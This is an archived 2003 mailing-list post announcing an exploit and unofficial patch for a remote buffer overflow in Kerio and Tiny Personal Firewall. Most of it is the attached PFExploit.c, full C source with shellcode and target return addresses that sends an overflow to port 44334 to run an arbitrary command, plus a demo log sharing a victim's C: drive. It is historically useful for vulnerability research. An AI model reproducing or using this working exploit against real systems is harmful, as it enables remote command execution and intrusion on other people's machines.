The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


s0h: Kerio Personal Firewall and Tiny Personal Firewall remote exploit/patch.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 8 May 2003 20:40:20 +0000
From: descript <descript@sv98.s0h.cc.>
To: [email protected]
Subject: s0h: Kerio Personal Firewall and Tiny Personal Firewall remote exploit/patch.

--ZJcv+A0YCCLh2VIg
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Hello,

April 28, 2003, the CoreSecurity team publishes security advisory concerning 2 holes in Kiero Personal Firewall, of which one of both is Remote Buffer Overflow in the process of connection of the remote admin module.
Kiero Personal Firewall using PFEngine, an common firewall engine, it proves that the vulnerability is also present in Tiny Personal Firewall! 
In the same time, every PFE firewall based products are vulnerable...

Today, the Thursday, May 8, 2003 6:27 PM, ThreaT (again@#!) from Skin Of Humanity Group released the exploit and the UNOFFICIAL patch for Kerio Personal Firewall version 2.1.4.0 (and previous versions) and Tiny Personal Firewall version 2.0.15.0.

Please enjoy sources of the patch at : http://www.s0h.cc/~threat/goodies/PFpatch/sources_PFpatch.zip

To correct this problem on your personnal firewall use this address : http://www.s0h.cc/~threat/goodies/PFpatch/PFpatch.exe

To understanding the hole and the exploitation method please get the exploit at http://www.s0h.cc/~threat/source/PFExploit.c.

A french advisory was writed at http://s0h.cc/~threat/goodies/PFpatch/

Sight that Kiero did not want to answer the CoreSecurity request, we did not inform Kerio. i think they do not understood what it passed. (no offence).

Special Thanks to :
     - Emiliano Kargieman from CoreSecurity
     - Hernán Gips from CoreSecurity 
     - Javier Burroni from CoreSecurity 
     - ThreaT from Skin Of Humanity 

Please note : 
The Skin Of Humanity Group protect all its members.if a problem occurs concerning this diffusion, the author is not responsible, the leader of the group is in all the responsible case of cause. Since the diffusion does not come from the creator but from the group. Thank you. 

Best regards and respect, 
Descript. <descript@s0h.cc.>
Skin Of Humanity
http://s0h.cc/



--ZJcv+A0YCCLh2VIg
Content-Type: text/plain; charset=unknown-8bit
Content-Disposition: attachment; filename="PFExploit.c"
Content-Transfer-Encoding: 8bit

/**************************************************************
 * Personal Firewall Engine remote buffer overflow Exploit
 **************************************************************
 *
 * Original information shared by CORE Security Technologies.
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
 * ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 * Released : 30/04/2003
 *
 * Coded By ThreaT.
 * [email protected]
 * http://s0h.cc/~threat
 *
 ********************************************************************
 *
 * This exploit take advantage of the vulnerability discovered by
 * CORE Security Technologies for execute a command on remote workstations
 * equiped with the fallowing PSW :
 *
 * - Tiny Personal Firewall 2.0.15
 * - Kerio Personal Firewall 2.1.4
 *
 *********************************************************************
 *
 * Usage : PFExploit.exe <target> <victim_ip> <command to execute>
 *
 * =====================================================================
 * !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
 * =====================================================================
 */


#include <windows.h>
#include <winsock.h>

#define len 0x1494

void main (int argc, char *argv[])
{
        SOCKET sock1;
        SOCKADDR_IN sin;
        int i;
        DWORD byte = htonl(len);

        char buffer[len], *p,

        shellcode[] = 

        "\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1" 
        "\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8" 
        "\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0" 
        "\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03" 
        "\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA" 
        "\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04" 
        "\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68" 
        "\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF" 
        "\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
        "\xD9\xFF\xFF\xFF";

        WSADATA wsadata;
        WORD wVersionRequested = MAKEWORD (2,0);

        struct _target {

        char Name[4];
        char *RetAddr;
        char *App;

        } targ[2] = {

        {"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
        {"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
        };
        

printf ("#############################################################\n"
        "Personal Firewall Engine, Remote buffer overflow Exploit !\n"
        "#############################################################\n"
        "Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
        "[email protected]\n"
        "http://s0h.cc/~threat\n-\n\n");
        
        if (argc < 4)
        {
        printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
        "TARGET ARE\n"
        "__________\n\n"
        "TPF : for Tiny Personal Firewall 2.0.15\n"
        "KPF : for Kerio Personal Firewall 2.1.4\n\n");

        ExitProcess (0);
        }

        if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
        {
        printf ("error, cannot allocate memory\n");
        ExitProcess (0);
        }


        memset (buffer,0x90,len);

        strcpy (p,shellcode);
        lstrcat (p,argv[3]);
        memcpy (&buffer[200],p,strlen (p)+1);

        for (i=0; i < 2 ; i++)
        if (!lstrcmpi (argv[1],targ[i].Name)) break;

        if (i > 1)
        {
        printf ("Erreur : la cible %s est inconnue\n",argv[1]);
        ExitProcess (0);
        }

        if (WSAStartup(wVersionRequested, &wsadata)) 
        {
        printf ("Erreur d'initialisation Winsock\n");
        ExitProcess (0);
        }

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr=inet_addr (argv[2]);
        sin.sin_port = htons (44334);

        memcpy (&buffer[0x1490],targ[i].RetAddr,4);

        printf ("Cible : %s\n\n"
            "Connecting to %s...", targ[i].App, argv[2]);
        
        sock1 = socket (AF_INET, SOCK_STREAM, 0);
        bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
        if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
        {
        printf ("connexion failed !\n");
        ExitProcess (0);
        }

        printf ("ok!\n\n"
            "sending crash for remote execution of '%s'...",argv[3]);
        
        Sleep (1000);
        send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
        send (sock1,buffer,len,0);

        puts ("ok");


}

/* DEMO ON MY LAN *

D:\code\exploits\kerio>ipconfig

Configuration IP de Windows 2000

Ethernet carte Connexion au réseau local 2 :

        État du media . . . . . . . . . . : Câble Déconnecté

Ethernet carte Connexion au réseau local :

        Suffixe DNS spéc. à la connexion. : ThreaT.lan
        Adresse IP. . . . . . . . . . . . : 10.0.0.1
        Masque de sous-réseau . . . . . . : 255.0.0.0
        Passerelle par défaut . . . . . . : 10.0.0.138


D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.


D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
[email protected]
http://s0h.cc/~threat
-

Cible : Tiny Personal Firewall 2.0.15

Connecting to 10.0.0.3...ok!

sending crash for remote execution of 'cmd /c net share c=c:"'...ok

D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partagées de \\10.0.0.3



Nom          Type         Local    Remarque

-------------------------------------------------------------------------------
c            Disque
La commande s'est terminée correctement.


D:\code\exploits\kerio>

* EOF */
--ZJcv+A0YCCLh2VIg--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



ðÁÒÔΣÒÙ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
èÏÓÔÉÎÇ:

úÁËÌÁÄËÉ ÎÁ ÓÁÊÔÅ
ðÒÏÓÌÅÄÉÔØ ÚÁ ÓÔÒÁÎÉÃÅÊ
Created 1996-2024 by Maxim Chirkov
äÏÂÁ×ÉÔØ, ðÏÄÄÅÒÖÁÔØ, ÷ÅÂÍÁÓÔÅÒÕ